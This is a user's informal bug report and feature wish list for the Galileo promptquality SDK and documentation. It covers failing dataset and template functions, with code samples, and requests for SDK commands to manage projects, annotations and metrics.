Feedback system on the docs is not working (mintly link is broken? ). So here's a list of issues and enhancements I came across. Happy to have a chat about them.
- Documentation at https://docs.galileo.ai/galileo
- SDK - https://promptquality.docs.galileo.ai/
The functions : list_datasets()
, get_dataset_content()
and create_dataset()
are not working as documented.
import os
import promptquality as pq
pq.login(os.environ["GALILEO_CONSOLE_URL"])
dataset = pq.create_dataset(
{
"virtue": ["benevolence", "trustworthiness"],
"voice": ["Oprah Winfrey", "Barack Obama"],
}
)
They keep asking for credentials, judging from the code it is a pass through from the API but doesn't work well with the promptquality module.
- Function
upload_dataset()
is available in the SDK, but not documented. - The template version id doesn't really seem to matter ?
data = {"topic": ["Quantum Physics", "Politics", "Large Language Models"]}
from promptquality.helpers import upload_dataset
# The template version id doesn't really seem to matter ?
dataset = upload_dataset(data, project_id, template_version_id=template.selected_version.id)
print(dataset)
- Set the name of a dataset (only in UI now)
- Update a dataset (not possible but useful to keep the same dataset id)
- Set the location (EU-east etc..) of where the dataset is stored
- Point the dataset to an S3 bucket and the likes , instead of local upload
Trouble reusing a template for a run:
Here's the code to create a template, that's working fine.
template = create_template(
template_name="my-template",
project_id=project_id,
template="""Answer the question based only on the following context:
{context}
Question: {question}
"""
)
Retrieving the template works too:
template = pq.get_template(project_name="my-project", template_name="my-template")
print(template)
The problem is in the reuse that template for a run:
run = pq.run(template=template.selected_version,
template_name=template.name,
dataset=data,
settings=pq.Settings(model_alias='ChatGPT (16K context)',
temperature=0.8,
max_tokens=400),
)
Not sure what the syntax is for this, this sample is not working and complains.
- command to list all templates
- make templates visible in the UI
- command to delete a template
- command to list all projects via SDK: to do automated cleanup
- command to delete a project via SDK : to do automated cleanup
- allow for widening the description of a project in the UI
- allow for batch deletion of projects in the UI
-
command to list all annotations via SDK
-
command to create annotations type via SDK
-
command to submit an annotation via SDK (instead of only via UI)
-
command to delete an annotation via SDK
-
describe how to get the values of an annotation type via SDK:
- I found that the annotations with their names become part of metrics attributes
-
Reuse the same name for an annotation across projects , hard to know as they are not visible in the UI
- Abilility to run non-local metrics with your own small models
- Make the metrics visible in the UI
- Function to get the value of a metric with a "space in the name" via SDK
Work around now is :
getattr(row.metrics,"Response Length")
- Not really a bug , but wonder about the attribute polution of the metrics object (using the name of the metric as the attribute name)
- Uploading python code as a custom scorer, would love to know that it can't execute shell or polute function call
- Would want to know more details on the sandbox in which the code runs
- Now only a single key can be added , potentially leading to possible quota issues, would be good to be able to override this per project / user
- Monitoring quotas
- Metrics using LLM as a judge can't be created via SDK